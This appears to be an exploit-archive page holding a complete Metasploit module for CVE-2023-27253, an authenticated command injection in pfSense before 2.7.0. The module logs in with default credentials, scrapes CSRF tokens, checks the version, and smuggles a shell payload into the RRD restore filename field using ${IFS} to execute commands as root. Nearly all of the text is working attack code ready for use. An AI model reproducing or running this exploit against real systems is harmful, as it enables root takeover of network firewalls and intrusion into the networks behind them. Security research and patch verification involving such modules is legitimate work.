扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 |
# Exploit Title: pfSense v2.7.0 - OS Command Injection #Exploit Author: Emir Polat # CVE-ID : CVE-2023-27253 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense Restore RRD Data Command Injection', 'Description' => %q{ This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an authenticated attacker with the"WebCfg - Diagnostics: Backup & Restore" privilege to execute arbitrary operating system commands as the "root" user. This module has been tested successfully on version 2.6.0-RELEASE. }, 'License' => MSF_LICENSE, 'Author' => [ 'Emir Polat', # vulnerability discovery & metasploit module ], 'References' => [ ['CVE', '2023-27253'], ['URL', 'https://redmine.pfsense.org/issues/13935'], ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94'] ], 'DisclosureDate' => '2023-03-18', 'Platform' => ['unix'], 'Arch' => [ ARCH_CMD ], 'Privileged' => true, 'Targets' => [ [ 'Automatic Target', {}] ], 'Payload' => { 'BadChars' => "\x2F\x27", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) ] end def check unless login return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!") end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'GET', 'keep_cookies' => true ) return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 unless res&.body&.include?('Diagnostics: ') return Exploit::CheckCode::Safe('Vulnerable module not reachable') end version = detect_version unless version return Exploit::CheckCode::Detected('Unable to get the pfSense version') end unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE') return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected") end Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!") end def login # Skip the login process if we are already logged in. return true if @logged_in csrf = get_csrf('index.php', 'GET') unless csrf print_error('Could not get the expected CSRF token for index.php when attempting login!') return false end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => '' }, 'keep_cookies' => true ) if res && res.code == 302 @logged_in = true true else false end end def detect_version res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'keep_cookies' => true ) # If the response isn't a 200 ok response or is an empty response, just return nil. unless res && res.code == 200 && res.body return nil end if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil? nil else version end end def get_csrf(uri, methods) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, uri), 'method' => methods, 'keep_cookies' => true ) unless res && res.body return nil # If no response was returned or an empty response was returned, then return nil. end # Try regex match the response body and save the match into a variable named csrf. if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil? return nil # No match could be found, so the variable csrf won't be defined. else return csrf end end def drop_config csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!') end post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"') post_data.add_part('', nil, nil, 'form-data; name="restorearea"') post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"') post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res && res.code == 200 && res.body =~ /<rrddatafile>/ return res.body else return nil end end def exploit unless login fail_with(Failure::NoAccess, 'Could not obtain the login cookies!') end csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!') end config_data = drop_config if config_data.nil? fail_with(Failure::UnexpectedReply, 'The drop config response was empty!') end if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil? fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!') end config_data.gsub!(' ', '${IFS}') send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};") post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"') post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"') post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"") post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.") end end end |
体验盒子
